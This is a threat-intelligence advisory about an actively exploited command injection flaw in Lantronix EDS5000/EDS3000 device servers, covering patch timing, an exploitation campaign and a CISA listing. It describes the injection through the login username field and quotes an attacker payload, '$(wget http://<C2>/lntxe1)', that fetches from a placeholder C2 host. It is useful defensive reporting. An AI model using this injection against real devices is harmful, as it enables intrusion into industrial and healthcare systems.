CVE-2025-67038: Critical Code Injection in Lantronix EDS5000 Series Under Active Exploitation — Threadlinqs Intelligence
Threat ID: TL-2026-1019 · Severity: CRITICAL · CVSS: 9.8 · Status: ACTIVE · Category: VULNERABILITY
Attribution: Chaya_006 · UNKNOWN
CISA warns of active exploitation of CVE-2025-67038 (CVSS 9.8), an unauthenticated OS command injection flaw in Lantronix EDS5000/EDS3000 serial-to-IP device servers. The LuCI HTTP JSON-RPC
CVE-2025-67038 is a critical (CVSS 3.1: 9.8) unauthenticated OS command injection vulnerability affecting the Lantronix EDS5000 series (EDS5008, EDS5016, EDS5032) and EDS3000 series (EDS3000PS) serial-to-IP device servers, which are widely deployed to bridge legacy serial equipment (SCADA/ICS controllers, medical devices, building automation systems) to IP networks. The vulnerability resides in the LuCI-derived HTTP JSON-RPC authentication module: when a login attempt to /cgi-bin/luci/rpc/auth fails, the device writes a log entry by concatenating the supplied username directly into a shell command string that is then passed to os.execute() without any input sanitization or escaping. By supplying a username containing shell metacharacters and command substitution syntax (e.g. $(...) or backticks), an unauthenticated remote attacker can execute arbitrary operating system commands with root privileges on the device.
The flaw is one of 22 vulnerabilities disclosed by Forescout Vedere Labs on April 21, 2026 under the umbrella research name BRIDGE:BREAK, which collectively affect Lantronix (8 CVEs across EDS3000PS/EDS5000) and Silex (14 CVEs in the SD330-AC) serial-to-IP converter product lines. BRIDGE:BREAK vulnerability classes span remote code execution (CVE-2026-32955, CVE-2026-32956, CVE-2025-67041), authentication bypass (CVE-2026-32960, CVE-2025-67039), denial-of-service (CVE-2026-32961, CVE-2015-5621), firmware tampering (CVE-2026-32958), arbitrary file upload (CVE-2026-32957), and configuration tampering (CVE-2026-32962, CVE-2026-32964). Forescout demonstrated that chaining these flaws could let an attacker who has already gained a network foothold (e.g. via a compromised industrial router or firewall) pivot through the converter to manipulate sensor readings and actuator behavior in industrial and healthcare OT environments.
Lantronix shipped fixed firmware (2.2.0.0R1 for EDS5000, 3.2.0.0R2 for EDS3000) on February 20, 2026, roughly seven weeks before the CVE was published to NVD on March 11, 2026 and two months before the BRIDGE:BREAK report. Despite the early patch, Forescout observed a threat cluster it tracks as Chaya_006 exploiting CVE-2025-67038 against its honeypots beginning April 5, 2026 — after the patch shipped, suggesting the attackers reverse-engineered the fix (a classic patch-diffing scenario) to construct a working exploit. Chaya_006 traffic used lntxe-prefixed marker strings ($(wget http://<C2>/lntxe1) through lntxea) to fingerprint successful command execution across multiple retrieval methods (wget, busybox wget, curl, Python urllib, raw /dev/tcp sockets, and DNS-based nslookup callbacks to a nip.io wildcard domain), indicating methodical capability testing rather than opportunistic scanning. A second wave on April 6 targeted a related luci_username parameter on other /cgi-bin/luci/ endpoints with both id-command and outbound-callback payloads. In parallel, Forescout tracked a distinct brute-force campaign (Jan 28 - Jun 6, 2026) totaling over 4,100 login attempts across three waves, using four usernames and 200+ password combinations against OpenWRT-derived LuCI credential endpoints, with 'root' as the primary target username.
CISA added CVE-2025-67038 to its Known Exploited Vulnerabilities (KEV) catalog on June 23, 2026, mandating FCEB agency remediation by June 26, 2026 under Binding Operational Directive 26-04. Shodan telemetry cited in coverage identifies roughly 31,850-32,000 internet-exposed OpenWRT LuCI-based devices, of which ~5,000 are believed to be honeypots and ~27,000 are believed to be genuine production systems, underscoring a substantial internet-facing attack surface for an OT-adjacent RCE bug.
Weaknesses (CWE)
CWE-78, CWE-88
Target sectors: industrial control systems, health, manufacturing, critical infrastructure, government administration, utilities, operational technology
Target regions: Global, North America, Asia-Pacific
Detections & IOCs
This threat has 9 detection rule(s) across Splunk SPL, Microsoft KQL and Sigma, and 35 indicator(s) of compromise. Detection query text and full IOC values are available to authenticated users and programmatically via the Threadlinqs MCP server (Purple tier). View plans.
VULNERABILITY, CRITICAL, threat intelligence, cybersecurity, CVE-2025-67038, T1592, T1590, T1595, T1595, T1190, T1133, T1078, T1059, T1203, T1068